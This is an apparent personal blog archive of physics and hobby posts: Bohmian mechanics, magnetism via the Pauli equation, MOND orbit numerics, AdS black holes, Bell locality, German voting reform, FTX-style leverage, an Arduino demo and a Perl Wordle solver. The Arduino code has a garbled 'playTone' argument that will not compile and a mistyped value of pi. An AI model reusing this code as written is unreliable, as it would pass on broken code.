atdotde

What happens to particles after they have been interacting according to Bohm?

2024-05-22T15:41:00.000+02:00

Once more, I am trying to better understand the Bohmian or pilot wave approach to quantum mechanics. And I came across this technical question, which I have not been able to successfully answer from the literature:

Consider a particle, described by a wave function $\psi(x)$ and a Bohmian position $q$ that both happily evolve in time according to the Schrödinger equation and the Bohmian equation of motion along the flow field. Now, at some point in time, the (actual) position of that particle gets recorded, either using a photographic plate oder by flying through a bubble chamber or similar.

Unless I am not mistaken, following the "having a position is the defining property of a particle"-mantra, what is getting recorded is $q$. After all, the fact, that there is exactly one place on a photographic place that gets dark was the the original motivation of introducing the particle position denoted by $q$. So far, so good (I hope).

My question, however, is: What happens next? What value of $q$ am I supposed to take for the further time evolution? I see three possibilities:

I use the $q$ that was recorded.
Thanks to the recording, the wave function collapses to an appropriate eigenstate (possibly my measurement was not exact, I just inferred that the particle is inside some interval, then the wave function only gets projected to that interval) and thanks to the interaction all I can know is that $q$ is then randomly distributed according to $|P\psi|^2$ (where $P$ is the projector) ("new equilibrium").
Anything can happen, depending on the detailed inner workings and degrees of freedom of the recording device, after all the Bohmian flow equation is non-local and involves all degrees of freedom in the universe.
Something else

All three sound somewhat reasonable, but upon further inspection, all of them have drawbacks: If option 1 were the case, that would have just prepared the position $q$ for the further evolution. Allowing this to happen, opens the door to faster than light signalling as I explained before in this paper. Option 2 gives up the deterministic nature of the theory and allows for random jumps of the "true" position of the particle. This is even worse for option 3: Of course, you can always say this and think you are safe. If there are other particles beyond the one recorded and their wave functions are entangled, option 3 completely gives up on making any prediction about the future also of those other particles. Note that more orthodox interpretations of quantum mechanics (like Copenhagen, whatever you understand under this name) does make very precise predictions about those other particles after an entangled one has been measured. So that would be a shortcoming of the Bohmian approach.

I am honestly interested in the answer to this question. So please comment if you know or have an opinion!

How do magnets work?

2024-01-24T16:45:00.004+01:00

I came across this excerpt from a a christian home schooling book:

which is of course funny in so many ways not at least as the whole process of "seeing" is electromagnetic at its very core and of course most people will have felt electricity at some point in their life. Even historically, this is pretty much how it was discovered by Galvani (using forge' legs) at a time when electricity was about cat skins and amber.

It also brings to mind this quite famous Youtube video that shows Feynman being interviewed by the BBC and first getting somewhat angry about the question how magnets work and then actually goes into a quite deep explanation of what it means to explain something

But how do magnets work? When I look at what my kids are taught in school, it basically boils down to "a magnet is made up of tiny magnets that all align" which if you think about it is actually a non-explanation. Can we do better (using more than layman's physics)? What is it exactly that makes magnets behave like magnets?

I would define magnetism as the force that moving charges feel in an electromagnetic field (the part proportional to the velocity) or said the other way round: The magnetic field is the field that is caused by moving charges. Using this definition, my interpretation of the question about magnets is then why permanent magnets feel this force. For the permanent magnets, I want to use the "they are made of tiny magnets" line of thought but remove the circularity of the argument by replacing it by "they are made of tiny spins".

This transforms the question to "Why do the elementary particles that make up matter feel the same force as moving charges even if they are not moving?".

And this question has an answer: Because they are Dirac particles! At small energies, the Dirac equation reduces to the Pauli equation which involves the term (thanks to minimal coupling)

$$(\vec\sigma\cdot(\vec p+q\vec A)^2$$

and when you expand the square that contains (in Coulomb gauge)

$$(\vec\sigma\cdot \vec p)(\vec\sigma\cdot q\vec A)= q\vec A\cdot\vec p + (\vec p\times q\vec A)\cdot\vec\sigma$$

Here, the first term is the one responsible for the interaction of the magnetic field and moving charges while the second one couples $$\nabla\times\vec A$$ to the operator $$\vec\sigma$$, i.e. the spin. And since you need to have both terms, this links the force on moving charges to this property we call spin. If you like, the fact that the g-factor is not vanishing is the core of the explanation how magnets work.

And if you want, you can add spin-statistics which then implies the full "stability of matter" story in the end is responsible that you can from macroscopic objects out of Dirac particles that can be magnets.

How not to detect MOND

2023-11-13T21:53:00.001+01:00

You might have heard about recent efforts to inspect lots of "wide binaries", double stars that orbit each other at very large distances, which is one of the tasks the Gaia mission was built for, to determine if their dynamics follows Newtonian gravity or rather MOND, the modified Newtonian dynamics (Einstein theory plays no role at such weak fields).

You can learn about the latest update from this video by Dr. Betty (spoiler: Newton's just fine).

MOND is an alternative theory of gravity that was originally proposed as an alternative to dark matter to explain galactic rotation curves (which it does quite well, some argue better than dark matter). Since, it has been investigated in other weak gravity situations as well. In short, it introduces an additional scale $a_0$ of dimension acceleration and posits that gravitational acceleration (either in Newton's law of gravity or in Newton's second law) are weakened by a factor

$$\mu(a)=\frac{a}{\sqrt{a^2+a_0^2}}$$

where a is the acceleration without the correction.

In the recent studies reported on in the video, people measure the stars' velocities and have to do statistics because they don't know about the orbital parameters and the orientation of the orbit relative to the line of sight.

That gave me an idea of what else one could try: When the law of gravity gets modified from its $1/r^2$ form for large separations and correspondingly small gravitational accelerations, the orbits will no longer be Keppler ellipses. What happens for example if this modified dynamics would result for example in eccentricities growing or shrinking systematically? Then we might observe too many binaries with large/small eccentricities and that would be in indication of a modified gravitational law.

The only question is: What does the modification result in? A quick internet search did not reveal anything useful combining celestial mechanics and MOND, so I had to figure out myself. Inspection shows that you can put the modification into a modification of $1/r^2$ into

$$\mu(1/r^2) \frac{\vec r}{r^3}$$

and thus into a corresponding new gravitational potential. Thus much of the usual analysis carries over: Energy and angular momentum would still be conserved and one can go into the center of mass system and work with the reduced mass of the system. And I will use units in which $GM=1$ to simplify calculations.

The only thing that will no longer be conserved is the Runge-Lenz-vector

$$\vec A= \vec p\times\vec L - \vec e_r.$$

$\vec A$ points in the direction of the major semi-axis and its length equals the eccentricity of the ellipse.

Just recall that in Newton gravity, this is an additional constant of motion (which made the system $SO(4,2)$ rather than $SO(3)$ symmetric and is responsible for states with different $\ell$ being degenerate in energy for the hydrogen atom), as one can easily check

$$\dot{\vec A} = \{H, \vec A\}= \dot{\vec p}\times \vec L-\dot{\vec e_r}=\dots=0$$

using the equations of motion in the first term.

To test this idea I started Mathematica and used the numerical ODE solver to solve the modified equations of motion and plot the resulting orbit. I used initial data that implies a large eccentricity (so one can easily see the orientation of the ellipse) and an $a_0$ that kicks in for about the further away half of the orbit.

Clearly, the orbit is no longer elliptic but precesses around the center of the potential. On the other hand, it does not look like the instantaneous ellipses would get rounder or narrower. So let's plot the orbit of the would be Runge Lenz vector:

Orbit of would be Runge Lenz vector $\vec A$

What a disappointment! Even if it is no longer conserved it seems to move on a circle with some additional wiggles on it (Did anybody mention epicycles?). So it is only the orientation of the orbit that changes with time but there is no general trend toward smaller or larger eccentricities that one might look out for in real data.

On the other hand the eccentricity $\|\vec A\|$ is not exactly conserved but wiggles a bit with the orbit but comes back to its original value after one full rotation. Can we understand that analytically?

To this end, we make use the fact that the equation of motion is only used in the first term when computing the time derivative of $\vec A$:

$$\dot{\vec A}=\left(1-\mu(1/r^2)\right) \dot{\vec e_r}.$$

$\mu$ differs from 1 far away from the center, where the acceleration is weakest. On the other hand, since $\vec e_r$ is a unit vector, its time derivative has to be orthogonal to it. But in the far away part of the the ellipse, $\vec e_r$ is almost parallel to the major semi axis and thus $\vec A$ and thus $\dot{\vec a}$ is almost orthogonal to $\vec A$. Furthermore, due to the reflection symmetry of the ellipse, the parts of $\dot{\vec e_r}$ that are not orthogonal to $\vec A$ will cancel each other on both sides and thus the wiggling around the average $\|\vec a\|$ is periodic with the period of the orbit. q.e.d.

There is only a tiny net effect since the ellipse is not exactly symmetric but precesses a little bit. This can be seen when plotting $\|\vec A\|$ as a function of time:

$\|\vec A\|$ as a function of time for the first 1000 units of time (brown) and from time 9000 to 10,000 (red)

The same plot zoomed in. One can see that the brown line's minimum is slightly below the red one.

If one looks very carefully, one sees a tiny trend towards larger values of eccentricity.

This is probably far too weak to have any observable consequence (in particular since there are a million other perturbing effects), but these numerics suggests that binaries whose orbits probe the MOND regime for a long time should show slightly larger eccentricities on average.

So Gaia people, go out an check this!

Can you create a black hole in AdS?

2023-04-28T10:53:00.004+02:00

Here is a little puzzle I just came up with when in today's hep-th serving I found

arXiv:2304.14351 [pdf, other]
Operator growth and black hole formation
Felix M. Haehl, Ying Zhao
Comments: 20+9 pages, 10 figures. arXiv admin note: text overlap with arXiv:2104.02736
Subjects: High Energy Physics - Theory (hep-th); General Relativity and Quantum Cosmology (gr-qc); Quantum Physics (quant-ph)
When two particles collide in an asymptotically AdS spacetime with high enough energy and small enough impact parameter, they can form a black hole.

But to explain it, I should probably say one or two things about thermal states in the algebraic QFT language: There (as we teach for example in our "Mathematical Statistical Physics" class) you take take to distinguish (quasi-local) observables which form a C*-algebra and representations of these on a Hilbert space. In particular, like for example for Lie algebras, there can be inequivalent representations that is different Hilbert spaces where the observables act as operators but there are no (quasi-local) operators that you can use to act on a vector state in one Hilbert space that brings you to the other Hilbert space. The different Hilbert space representations are different super-selection sectors of the theory.

A typical example are states of different density in infinite volume: The difference in particle number is infinite but any finite product of creation and annihilation operators cannot change the particle number by an infinite amount. Or said differently: In Fock space, there are only states with arbitrary but finite particle number, trying to change that you run into IR divergent operators.

Similarly, assuming that the (weak closure) of the representation on one Hilbert space if a type III factor as it should be for a good QFT, states of different temperatures (KMS states in that language) are disjoint, meaning they live in different Hilbert spaces and you cannot go from one to the other by acting with a quasi-local operator. This is proven as Theorem 5.3.35 in volume 2 of the Bratelli/Robinson textbook.

Now to the AdS black holes: Start with empty AdS space also encoded by the vacuum in the holographic boundary theory. Now, at t=0 you act with two boundary operators (obviously quasi-local) to create two strong gravitational wave packets heading towards each other with very small impact parameter. Assuming the hoop conjecture, they will create a black hole when they collide (probably plus some outgoing gravitational radiation).

Then we wait long enough for things to settle (but not so long as the black hole starts to evaporate in a significant amount). We should be left with some AdS-Kerr black hole. From the boundary perspective, this should now be a thermal state (of the black hole temperature) according to the usual dictionary.

So, from the point of the boundary, we started from the vacuum, acted with local operators and ended up in a thermal state. But this is exactly what the abstract reasoning above says is impossible.

How can this be? Comments are open!

Get Rich Fast

2022-11-26T12:23:00.002+01:00

I wrote a text as a comment on the episode of the Logbuch Netzpolitik podcast on the FTX debacle but could not post it to the comment section (because that appears to be disabled). So in order not to waste I post it here (in German):

1. Hebel (leverage): Wenn ich etwa glaube, dass in Zukunft die Appleaktie weiter steigen wird, kann ich mir eine Appleaktie kaufen, um davon zu profitieren. Die kostet momentan etwa 142 Euro, kaufe ich eine und steigt der Preis auf 150 Euro habe ich natürlich 8 Euro Gewinn gemacht. Besser natürlich noch, wenn ich 100 kaufe, dann mache ich 800 Euro Gewinn. Hinderlich ist dabei nur, wenn ich nicht 14200 Euro dafür zur Verfügung habe. Aber kein Problem, dann nehme ich eben einen Kredit über den Preis von 99 Aktien (also 14038 Euro) auf. Der Einfachheit halber ignorieren wir mal, dass ich dafür Zinsen zahlen muss, die machen das ganze Spiel für mich nur unattraktiver. Ich kaufe also 100 Aktien, davon 99 auf Pump. Ist der Kurs bei 150, verkaufe ich sie wieder, zahle den Kredit ab und gehe mit 800 Euro mehr nach Hause. Ich habe also den Kursgewinn verhundertfacht.

Doof nur, dass ich gleichzeitig auch das Verlustrisiko verhundertfache: Fällt der Aktienkurs entgegen meiner optimistischen Erwartungen, kann es schnell sein, dass ich beim Verkauf der Aktien nicht mehr genug Geld zusammenbekomme, um den Kredit abzuzahlen. Das tritt dann ein, wenn die 100 Aktien weniger wert sind, als der Kredit, wenn also der Aktienwert unter 140,38 Euro fällt. Wenn ich in dem Moment meine Aktien verkaufe, kann ich grade noch meine Schulden bezahlen, habe aber mein Eigenkaptial, das war die eine Aktie, die ich von meinem eigenen Geld gekauft habe, komplett verloren. Ist der Kurs aber noch tiefer gefallen, kann ich beim Spekulieren auf Pump aber mehr als all mein Geld verlieren, ich habe nichts mehr, aber immer noch nicht meine Schulden abbezahlt. Davor hat aber natürlich auch die Bank, die mir den Kredit gegeben hat, Angst, daher zwingt sie mich spätestens, wenn der Kurs auf 140,38 gefallen ist, die Aktien zu verkaufen, damit sie auf jeden Fall ihren Kredit zurück bekommt. Daniel nennt das "glattstellen".

2. Das finde ich natürlich blöd, weil der Kurs viel schneller mal um diese 1,42 Euro fällt, als dass er um 8 Euro steigt. Um das zu verhindern, kann ich bei der Bank noch andere Dinge von Wert hinterlegen, zB mein iPhone, das noch 100 Euro wert ist. Dann zwingt mich die Bank erst meine Aktien zu verkaufen, wenn der Wert der Aktien plus den 100 Euro für das iPhone unter den Wert des Kredits fällt. Sie könnte ja immer noch das iPhone verkaufen, um ihr Geld zurück zu bekommen. Wenn ich aber kein iPhone zum Hintelegen habe, muss ich etwas anderes werthaltiges bei der Bank hinterlegen (collateral).

3. Hier kommen die Tokens ins Spiel. Ich kann mir 1000 Kryptotokens ausdenken (ob mit dem Besitz von computergenerieren Cartoons von Tim und Linus verknüpft ist dabei egal). Da ich mir die nur ausgedacht habe, bin ich noch nicht weiter, so haben sie ja keinen Wert. Ich kann versuchen, sie zu verkaufen, aber dabei werde ich nur ausgelacht. Hier kommt meine zweite Firma, der Investment Fond ins Spiel: Mit dem kaufe ich mir selber 100 der Tokens zum Preis von 30 Euro das Stück ab. Wenn jetzt nicht klar ist, dass ich mir selber die Dinger abgekauft habe (ggf. über einen Strohmann:in) sieht es so aus, als würden die Tokens ernsthaft für einen Wert von 30 Euro gehandelt. Ausserdem verkaufe ich noch den Kunden meines Fonts 100 weitere auch für 30 Euro mit dem Versprechen, dass die Besitzer der Coins Rabatt auf die Gebühren meines Fonds bekommen. Spätestens jetzt ist der Wert von 30 Euro pro Token etabliert. Ich habe von den ursprünglichen 1000 immer noch 800. Jetzt kann ich behaupten, ich habe Besitz im Wert von 24000, denn das sind 800 mal 30 Euro. Diesen Besitz habe ich quasi aus dem Nichts geschaffen, da die Annahme, dass ich auch noch echte Käufer für die anderen 800 bei diesem Preis finden kann, Quatsch ist.

Wenn ich das ganze aber nur gut genug verschleiere, glaubt mir vielleicht jemand, dass ich wirklich auf Werten von 24000 Euro sitze. Insbesonder die Bank aus Schritt 1 und 2 glaubt mir das vielleicht und ich kann diese Tokens als Sicherheit für den Kredit hinterlegen und damit noch höhere Kredite aufnehmen, um damit Apple-Aktien zu kaufen.

Das ganze fliegt erst auf, wenn der Kurs der Aktien so weit fällt, dass die Bank darauf besteht, dass der Kredit zurück gezahlt werden muss. Dann muss ich eben nicht nur die Aktien und das iPhone verkaufen, sondern auch noch die weiteren Tokens. Und dann stehe ich eben ohne Hose da, weil dann klar wird, dass natürlich niemand die Tokens, die ich mir einfach ausgedacht habe, haben will, schon gar nicht für 30 Euro. Dann fehlt in den Worten von Daniel die "Liquidität".

Das ist nach meinem Verständnis, was passiert ist, natürlich nicht mit Apple-Aktien und iPhones, aber im Prinzip. Und der Sinn des mit sich selbst Geschäfte-im-Kreis machen, ist eben, damit künstlich die scheinbaren Preise von etwas, wovon ich noch mehr habe, in die Höhe zu treiben. Der Fehler des ganzen ist, dass schwierig ist, die Werte von etwas zu beurteilen, was gar nicht wirkich gehandelt wird, bzw wo der Wert nur auf anderen angenommenen Werten beruht, wobei sich die Annahmen über die Werte sehr schnell ändern können, wenn jemand "will sehen!" sagt und keine realen Werte (wie traditionell in Form von Fabriken, Know-How etc) dahinter liegen.

No action at a distance, spooky or not

2022-10-04T21:23:00.004+02:00

On the occasion of the announcement of the Nobel prize for Aspect, Clauser and Zeilinger for the experimental verification that quantum theory violates Bell's inequality, there seems to be a strong urge in popular explanations to state that this proves that quantum theory is non-local, that entanglement is somehow a strong bond between quantum systems and people quote Einstein on the "spooky action at a distance".

But it should be clear (and I have talked about this here before) that this is not a necessary consequence of the Bell inequality violation. There is a way to keep locality in quantum theory (at the price of "realism" in a technical sense as we will see below). And that is not just a convenience: In fact, quantum field theory (and the whole idea of a field mediating interactions between distant entities like the earth and the sun) is built on the idea of locality. This is most strongly emphasised in the Haag-Kastler approach (algebraic quantum field theory), where pretty much everything is encoded in the algebras of observables that can be measured in local regions and how these algebras fit into each other. So throwing out locality with the bath water removes the basis of QFT. And I am convinced this is the origin why there is no good version of QFT in the Bohmian approach (which famously sacrifices locality to preserve realism, something some of the proponents not even acknowledge as an assumption as it is there in the classical theory and it needs some abstraction to realise it is actually an assumption and not god given).

But let's get technical. To be specific, I will use the CHSH version of the Bell inequality (but you could as well use the original one or the GHZ version as Coleman does). This is about particles that have two different properties, here termed A and B. These can be measured and the outcome of this measurement can be either +1 or -1. An example could be spin 1/2 particles and A and B representing twice the components of the spin in either the x or the y direction respectively.

Now, we have two such particles with these properties A and B for particle 1 and A' and B' for particle 2. CHSH instruct you to look at the expectation value of the combined observable

\[A (A'+B') + B (A'-B').\]

Let's first do the classical analysis: We don't know about the two properties of particle 2, in the primed variables. But we know, they are either equal or different. In case they are equal, the absolute value of A'+B' is 2 while A'-B'=0. If they are different, we have A'+B'=0 while the absolute value of A'-B' is two. In either case, one one of the two terms contribute and in absolute value it is 2 times the unprimed observable of particle one, A for equal values in particle 2 an B for different values for particle 2. No matter which possibility is realised, the absolute value of this observable is always 2.

If you allow for probabilistic outcomes of the measurements, you can convince yourself that you can also realise smaller absolute values than 2 but never larger ones. So much for the classical analysis.

In quantum theory, you can, however, write down an entangled state of the two particle system (in the spin 1/2 case specifically) where this expectation value is 2 times the square root of 2, so larger than all the possible classical values. But didn't we just prove it cannot be larger than 2?

If you are ready to give up locality you can now say that there is a non-local interaction that tells particle 2 if we measure A or B on particle one and by this adjust its value that is measured at the site of particle two. This is, I presume, what the Bohmians would argue (even though I have never seen a version of this experiment spelled out in detail in the Bohmian setting with a full analysis of the particles following the guiding equation).

But as I said above, I would rather give up realism: In the formula above and the classical argument, we say things like "A' and B' are either the same or opposite". Note, however, that in the case of spins, you cannot both measure the spin in x and in y direction on the same particle because they do not commute and there is the uncertainty relation. You can measure either of them but once you decided you cannot measure the other (in the same round of the experiment). To give up realism simply means that you don't try to assign a value to an observable that you cannot measure because it is not compatible with what you actually measure. If you measure the spin in x direction it is no longer the case that the spin in the y direction is either +1/2 or -1/2 and you just don't know because you did not measure it, in the non-realistic theory you must not assign any value to it if you measured the x spin. (Of course you can still measure A+B, but that is a spin in a diagonal direction and then you don't measure either the x nor the y spin).

You just have to refuse to make statements like "the spin in x and y directions are either the same or opposite" as they involve things that cannot all be measured, so this statement would be non-observable anyways. And without these types of statement, the "proof" of the inequality goes down the drain and this is how the quantum theory can avoid it. Just don't talk about things you cannot measure in principle (metaphysical statements if you like) and you can keep our beloved locality.

Giving the Playground Express a Spin

2022-07-21T20:32:00.001+02:00

The latest addition to our single chip computer zoo is Adafruit's Circuit Playground Express. It is sold for about 30$ and comes with a lot of GIO pins, 10 RGB LEDs, a small speaker, lots of sensors (including acceleration, temperature, IR,...) and 1.5MB of flash rom. The excuse for buying it is that I might interest the kids in it (being better equipped on board than an Arduino while being less complex than a RaspberryPi.

As the ten LEDs are arranged around the circular shape, I thought a natural idea for a first project using the accelerometer would be to simulate a ball going around the circumference.

The video does not really capture the visual impression due to overexposure of the lit LEDs.

The Circuit Playground Express comes with a graphical programming language (like Scratch) and an embedded version of Python. But you can also directly program it with the Arduino IDE to code in C which I used since this is what I am familiar with.

Here is the source code (as always with GPL 2.0)

// A first project simulating a ball rolling around the Playground Express

#include <Adafruit_CircuitPlayground.h>

uint8_t pixeln = 0;
float phi = 0.0;
float phid = 0.10;

void setup() {
CircuitPlayground.begin();
CircuitPlayground.speaker.enable(1);
}

int phi2pix(float alpha) {
alpha *= 180.0 / 3.141459;
alpha += 60.0;
if (alpha < 0.0)
alpha += 360.0;
if (alpha > 360.0)
alpha -= 360.0;

return (int) (alpha/36.0);
}

void loop() {
static uint8_t lastpix = 0;
float ax = CircuitPlayground.motionX();
float ay = CircuitPlayground.motionY();
phid += 0.001 * (cos(phi) * ay - sin(phi) * ax);
phi += phid;
phid *= 0.997;
Serial.print(phi);

while (phi < 0.0)
phi += 2.0 * 3.14159265;

while (phi > 2.0 * 3.14159265)
phi -= 2.0 * 3.14159265;

pixeln = phi2pix(phi);

if (pixeln != lastpix) {
if (CircuitPlayground.slideSwitch())
CircuitPlayground.playTone(2ssseff000, 5);
lastpix = pixeln;
}
CircuitPlayground.clearPixels();
CircuitPlayground.setPixelColor(pixeln, CircuitPlayground.colorWheel(25 * pixeln));
delay(0);
}

Voting systems, once more

2022-07-09T13:46:00.004+02:00

Over the last few days, I have been involved in some heated Twitter discussions around a possible reform of the voting system for the German parliament. Those have sharpened my understanding of one or two things and that's why I think it's worthwhile writing a blog post about it.

The root of the problem is that the system currently in use tries to optimise two goals which are not necessarily compatible: Proportional representation (number of seats for a party should be proportional to votes received) and local representation (each constituency being represented by at least one MP). If you only wanted to optimise the first you would not have constituencies but collect all votes in one big bucket and assign seats accordingly to the competing parties, if you only wanted to optimise the second goal you would use a first past the pole (FPTP) voting system like in the UK or the US.

In a nutshell (glancing over some additional complications), the current system is as follows: We start by assuming there are twice as many seats in parliament as there are constituencies. Each voter has two different votes. The first is a FPTP vote that determines a local candidate that will definitely get a seat in parliament. The second vote is the proportional vote that determines the percentage of seats for the parties. The parties will then send further MPs to reach their allocated lot but the winners of the constituencies are counted as well and the parties only "fill up" the remaining seats from their party list. So far so good, you have achieved both goals: There is one winner MP from each constituency and the parties have seats proportional to the number of (second) votes. Great.

Well, except if a party wins more constituencies than they are assigned seats according to proportional votes. This was not so much of a problem some decades ago when there were two major parties (conservative and social democrat) and one or two smaller ones. The two parties would somehow share the constituency wins but since those make up only half of the total number of seats those would not be many more than their share to total seats (which would typically be well above 30% or even 40%).

The voting system's solution to this problem is to increase the total number of seats to the minimal total number such that each party's number of won constituencies is at least as high as their shore of total seats according to proportional vote.

But these days, the two former big parties have lost a lot of their support (winning only 20-25% in the last election) and four additional parties being also represented and not getting much less votes than the two former big ones. In the constituencies it is not rare that you win your FPTP seat with less than 30% of the votes in the constituency and it the last election it can be as low as only 18% sufficient to being the winner of a seat. This lead to the parliament having 736 seats as compared to the nominal size of 598 and there were polls not long before that election which suggested 800+ seats or possibly even over 1000.

A particular case is the CSU, the conservative party here in Bavaria (which is nominally a different party from the CDU, which is the conservative party in the rest of Germany. In Bavaria, the CDU is not competing while in the rest of the country, the CSU is not on the ballot): Still being relative winners here, they won all but one constituencies but got only about 30% of the votes in Bavaria which translates to slightly above 5% of all votes in Germany.

According to a general sentiment, 700+ seats is far too big (for a functioning parliament and also cost wise), so the system should be reformed. But people differ on how to reform it. A simple solution mathematically would be to increase the size of the constituencies to decrease their total number. So the total number of constituency winners to be matched by proportional votes would be less. But that solution is not very popular with the main argument being that those constituents would be too big for a reasonable contact of the local MPs to their constituents. Another likely reason nobody really likes to talk about is that by redrawing district lines by a lot would probably cause a lot of infighting in all the parties because the candidatures would have to be completely redistributed with many established candidates losing their job. So that is off the table, after all, it's the parties in parliament which decide about the voting system by simple majority (with boundary conditions set by relatively vague rules set by the constitution).

There is now a proposal by the governing social democrat-green-liberal coalition. The main idea is to weaken the FPTP system in the constituencies maintaining the proportional vote: Winning a constituency no longer guarantees you a seat in parliament. If you party wins more constituencies than their share of total seats according to the proportional votes, those constituency seats where the party's relative majority was the smallest would be allocated to the runner up (as that candidates party still has to be allocated seats according to proportional vote). This breaks FPTP, but keeps the proportional representation as well as the principle of each constituency sending at least one MP while fixing the total number of seats in parliament to the magic 598.

The conservatives in opposition do not like this idea (been traditionally the relatively strongest parties and thus tending to win more constituencies). You can calculate how many seats each party would get assuming the last election's votes: All parties would have to give up about 18% of their seats except for the CSU, the Bavarian conservatives, who would lose about 25% since some fine print I did not explain so far favours parties winning relatively many constituencies directly.

The conservatives also have a proposal. They are willing to give up proportionality in favour of maintaining FPTP and fixing the number of seats to 598: They propose to assign 299 of the seats according to FPTP to constituency winners and only distributing the remaining 299 seats proportionally. So they don't want to include the constituency winners in the proportional calculation.

This is the starting point of the Twitter discussions. Both sides accusing the other side have an undemocratic proposal. One side says a parliament where the majorities do not necessarily (and with current data) unlikely represent majorities in the population is not democratic while the other side arguing that denying a seat to a candidate that won his/her constituency (even by a small relative majority) being not democratic.

Of course it is a total coincidence that each side is arguing for the system that would be better for them (the governing coalition hurting everybody almost equally only the CSU a bit more while the conservative proposal actually benefitting the conservatives quite a bit while in particular hurting the smaller parties that do not win many constituencies or none at all).

(Ampel being the governing coalition, Union being the conservative parties).

Of course, both proposals are in a mathematical sense "democratic" each in their own logic emphasising different legitimate aspects (accurate proportional representation vs accurate representation of local winners).

Beyond the understandable preference for a system that favours one's own political side I think a more honest discussion would be about which of these legitimate aspects is actually more relevant for the political discourse. If a lot of debates would be along geographic lines, north against south, east against west or even rural vs urban then yes, it is very important that the local entities are as accurately represented as possible to get the outcomes of these debates right. That would emphasise FPTP as making sure local communities are most honestly represented.

If however typical debates are along other fault lines, for example progressive vs conservative or pro business vs pro social wealth redistribution then we should make sure the views of the population are optimally represented. And that would be in favour of a strict proportional representation.

Guess what I think is actually the case.

All that in addition to a political tradition in which "calling your local MP or representative" is a much less common thing that in anglo-saxon countries and studies showing that even shortly after a general election less than a quarter of the voters being able to name at least two of the names of their constituency's candidates casting serious doubts about an informed decision at the local level rather than along party lines (where parties being only needed to make sure there is only one candidate per party in the FPTP system while being the central entity for proportional votes).

PS: The governing coalition's proposal has some ambiguities as well (as I demonstrate here --- in German).

You got me wordle!

2022-01-17T18:41:00.001+01:00

Since a few days, I am following the hype and play wordle. I think I got lucky the first days but I had already put in some strategy as in starting with words where the possible results are most telling. I was thinking that getting the vowels right early is a good idea so I tend to start with "HOUSE" (continuing three vowels and an S) possibly followed by "FAINT" (containing the remaining vowels plus important N and T).

With this start it never took me more than four guesses so far and twice I managed to find the solution in three guesses.

Of course, over time you start thinking how to optimise this. I knew that Donald Knuth had written a paper solving the original Mastermind showing that five moves are sufficient to always find the answer. So today, I sat down and wrote a perl script to help. It does not do the full minimax (but that shouldn't be too hard from where I am) but at least tells you which of your possible next guesses leaves the best worst case in terms of number of remaining words after knowing the result of your guess.

In that metric, it turns out "ARISE" is the optional first guess (leaving at most 168 out of the possible 2314 words on this list after knowing the result). In any case, here is the source:

NB: Since i started playing, there was no word that contained the same letter more than once, so I am not 100% sure how those cases are handled (like what color do the two 'E' in "AGREE" receive if the solution is "AISLE" (in mastermind logic, the second would be green the other grey, not yellow) and what when the solution were "EARLY"? So my script does not handle those cases correct probably (for EARLY it would color both yellow).

#!/usr/local/bin/perl -w

use strict;

# Load the word list of possible answers
my @words = ();
open (IN, "answers.txt") || die "Cannot open answers: $!\n";
while(<IN>) {
  chomp;
  push @words, uc($_);
}
close IN;

my %letters = ();
my @appears = ();

# Positions at which letter $l can still appear
foreach my $c (0..25)  {
  my $l = chr(65 + $c);
  $letters{$l} = [1,1,1,1,1];
}


# Running without an initial guess shows that ARISE is the best guess at it leaves 168 words.

&filter("ARISE", &bewerten("ARISE", "SOLAR"));
#&filter("SMART", &bewerten("SMART", "SOLAR"));

# Find the remaining words
my @remain = @words;
# Only keep words containing the letters in @appeads
foreach my $a(@appears) {
  @remain = grep {/$a/} @remain;
}
my $re = &makeregex;

# Apply positional constraints
@remain = grep {/$re/} @remain;


my $min = @remain;
my $best = '';

# Loop over all possible guesses and targets and count how ofter a potential result appears for a guess
foreach my $g(@remain) {
  my %results = ();
  foreach my $t(@remain) {
    ++$results{&bewerten($g, $t)}
  }
  my $max = 0;
  foreach my $res(keys %results) {
    $max = $results{$res} if $results{$res} > $max;
  }
  #print "$g leaves at most $max.\n";
  if ($min > $max) {
    $min = $max;
    $best = $g;
  }
}

print "Best guess: $best leaves at most $min.\n";

# Assemble a regex for the postional informatiokn
sub makeregex {
  my $rem = '';
  foreach my $p (0..4) {
    $rem .= '[';
    foreach my $l (sort keys %letters) {
      $rem .= $l if $letters{$l}->[$p];
    }
    $rem .= ']';
  }
  return $rem;
}

# Find new constraints arising from the result of a guess
sub filter {
  my ($guess, $result) = @_;

  my @a = split //, $result;
  my @w = split //, uc($guess);
  foreach my $p (0..4) {
    my $l = $w[$p];
    if ($a[$p] == 0) {
      $letters{$l} = [0,0,0,0,0];
    } elsif ($a[$p] == 1) {
      &setletter($l, $p, 0);
      push @appears, $l;
    } else {
      foreach my $o (sort keys %letters) {
	&setletter($o, $p, 0);
      }
      &setletter($l, $p, 1);
    }
  }
}

# Update the positional information for letter $l at position $p with value $v
sub setletter {
  my ($l, $p, $v) = @_;
  my @a = @{$letters{$l}};
  $a[$p] = $v;
  $letters{$l} = \@a;
}

# Find the result for $guess given the $target
sub bewerten {
  my ($guess, $target) = @_;
  my @g = split //, $guess;
  my @t = split //, $target;

  my @result = (0,0,0,0,0);
  foreach my $p(0..4) {
    if($g[$p] eq $t[$p]) {
      $result[$p] = 2;
      $t[$p] = '';
      $g[$p] = 'x';
    }
  }
  $target = join('', @t);
  foreach my $p(0..4) {
    if($target =~ /$g[$p]/) {
      $result[$p] = 1;
    }
  }
  return join('', @result);
}

Email is broken --- the spammers won

2021-07-23T15:02:00.000+02:00

I am an old man. I am convinced email a superior medium for person to person information exchange. It is text based, so you don't need special hardware to use it, it can still transport various media formats and it is inter-operational, you are not tied to one company offering a service but thanks to a long list of RFCs starting with number 822 everybody can run their own service. Via GPG or S/MIME you can even add somewhat decent encryption and authentication (at least for the body of the message) even though that is not optimal since historically it came later.

But the real advantage is on the client side: You have threading, you have the option to have folders to store your emails, you can search through them, you can set up filters so routine stuff does not clog up your inbox. And when things go really pear shaped (as they tend to do every few years), you can still recover your data from a text file on your hard drive.

This is all opposed to the continuous Now of messengers where already yesterday's message has scrolled up never to be seen again. But the young folks tend to prefer those and I cannot see any reason those would be preferable (except maybe that you get notifications on your phone). But up to now, it was still an option to say to our students "if you want to get all relevant information, check your email, it will be there".

But today, I think, this is finally over. The spammers won.

